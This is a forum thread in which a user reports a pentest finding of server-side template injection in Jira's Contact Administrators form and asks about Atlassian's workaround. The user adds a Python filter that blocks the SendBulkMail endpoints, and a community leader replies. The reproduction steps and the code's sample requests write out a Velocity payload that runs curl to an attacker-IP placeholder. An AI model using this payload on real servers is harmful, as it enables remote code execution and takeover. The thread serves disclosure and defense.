Contact Administrator Form in Jira | Vulnerability: Server-Side Template Injection

Muthu Praveen
January 30, 2024

We have one vulnerability reported during the pentest: Server-Side Template Injection

Steps to Reproduce:
1. Navigate to "https://*.com/jira/secure/ContactAdministrators!default.jspa"
2. Insert a template injection payload "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://<AttackerIP>/rcetest?a=a').waitFor()" in the Subject field, which requests a connection back to the attacker machine by issuing a curl command, and click "Send".
3. Upon a successful response we can observe that the server is making connections back to the attacker-controlled server, which can lead to full control of the web server.

From the finding we saw that it was related to the article below. Atlassian has mentioned this will be fixed in the 9.4.x version:
https://community.atlassian.com/t5/Jira-Software-articles/CVE-2019-11581-Critical-Security-Advisory-for-Jira-Server-and/ba-p/1128241

As per the recent pentest, we found this issue still exists. In the above article they have given the mitigation steps for this issue.

Does anyone know the impact of applying the workaround below?

Mitigation Steps
If you are unable to upgrade Jira immediately, then as a temporary workaround, you can:

1. Disable the Contact Administrators Form; and
2. Block these endpoints from being accessed:
   - /secure/admin/SendBulkMail!default.jspa,
   - /admin/SendBulkMail!default.jspa, and
   - /SendBulkMail!default.jspa.
Note that blocking the SendBulkMail endpoint will prevent Jira Administrators from being able to send bulk emails to users.
This can be achieved by denying access in the reverse-proxy, load balancer, or Tomcat directly (see the KB: How to block access to a specific URL at Tomcat).
After upgrading Jira to a fixed version, you can re-enable the Administrator Contact Form, and unblock the SendBulkMail endpoints.
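
Added example (not from the post above and not Atlassian's code): a small Python request filter that models the advisory's temporary workaround and flags the Velocity reflection chain used in the pentest payload, plus a helper to re-test that the SendBulkMail paths are really denied through the proxy. The /jira context path, the sample requests and the stub status function are assumptions/constructed. Matching on the action name "SendBulkMail" rather than on the three literal "!default.jspa" paths is my own stricter choice, so that the submit form of the same action is denied as well.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed context path; the report's URL is https://*.com/jira/secure/ContactAdministrators!default.jspa
CONTEXT_PATH = "/jira"

# Paths listed in the advisory workaround (relative to the context path).
SENDBULKMAIL_PATHS = (
    "/secure/admin/SendBulkMail!default.jspa",
    "/admin/SendBulkMail!default.jspa",
    "/SendBulkMail!default.jspa",
)

# Indicators of the Velocity reflection chain used in the reported payload.
SSTI_INDICATORS = (
    r"\$i18n\.",
    r"\.getClass\(\)",
    r"\.forName\(",
    r"java\.lang\.Runtime",
    r"\.exec\(",
)
_INDICATOR_RE = [re.compile(p, re.IGNORECASE) for p in SSTI_INDICATORS]


def normalize_path(raw_url):
    """URL-decode the path and strip the Jira context path, so an encoded
    variant such as SendBulkMail%21default.jspa is matched as well."""
    path = unquote(urlsplit(raw_url).path)
    if path == CONTEXT_PATH or path.startswith(CONTEXT_PATH + "/"):
        path = path[len(CONTEXT_PATH):] or "/"
    return path


def action_name(path):
    """'/secure/admin/SendBulkMail!default.jspa' -> 'SendBulkMail'."""
    last = path.rsplit("/", 1)[-1]
    return re.split(r"[!.]", last, maxsplit=1)[0]


def is_sendbulkmail(raw_url):
    """Deny by action name (my choice, stricter than the advisory's literal
    paths) so SendBulkMail.jspa is covered together with SendBulkMail!default.jspa."""
    return action_name(normalize_path(raw_url)) == "SendBulkMail"


def ssti_indicators(value):
    """Return the indicator patterns found in one parameter value."""
    return [p.pattern for p in _INDICATOR_RE if p.search(value)]


def check_request(method, raw_url, form=None):
    """Classify one request: ('block', why) for the workaround endpoints,
    ('alert', why) when any query or form value carries SSTI indicators,
    otherwise ('allow', '')."""
    if is_sendbulkmail(raw_url):
        return "block", "SendBulkMail endpoint denied per advisory workaround"
    values = [v for vs in parse_qs(urlsplit(raw_url).query).values() for v in vs]
    values += list((form or {}).values())
    for v in values:
        hits = ssti_indicators(v)
        if hits:
            return "alert", f"SSTI indicators {hits} in {method} {normalize_path(raw_url)}"
    return "allow", ""


def verify_workaround(status_for):
    """status_for(url) -> HTTP status code. Returns the advisory paths that are
    still reachable (anything other than 403/404), for re-testing the block."""
    return [p for p in SENDBULKMAIL_PATHS
            if status_for(CONTEXT_PATH + p) not in (403, 404)]


if __name__ == "__main__":
    # Constructed sample requests, including the payload from the pentest report.
    PAYLOAD = ("$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null)"
               ".invoke(null,null).exec('curl http://<AttackerIP>/rcetest?a=a').waitFor()")
    samples = [
        ("GET", "/jira/secure/admin/SendBulkMail!default.jspa", None),
        ("GET", "/jira/secure/admin/SendBulkMail%21default.jspa", None),
        ("POST", "/jira/secure/ContactAdministrators.jspa", {"subject": PAYLOAD, "details": "test"}),
        ("POST", "/jira/secure/ContactAdministrators.jspa", {"subject": "Login problem"}),
    ]
    for method, url, form in samples:
        print(method, url, "->", check_request(method, url, form))
    # Stub: pretend the proxy answers 403 for every path, so nothing is still reachable.
    print("still reachable:", verify_workaround(lambda url: 403))
```

In practice verify_workaround would be handed a function that performs the HTTP request through the reverse proxy and returns the status code; a 200 on any of the three paths means the block is missing for that variant, which is what a re-test after applying the workaround should catch. The filter only stands in for the proxy rule until the upgrade; it does not fix the template engine.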

1 answer

0 votes
Mirek
Community Leader
January 31, 2024

Hi @Muthu Praveen 

Just to be clear: are you saying that you upgraded Jira to version 9.4 (or are on that version) and this is still a problem?

Basically it is a pretty old issue, so if you are on a newer version than the one that was recommended, it should already be addressed without the need to apply the workaround.
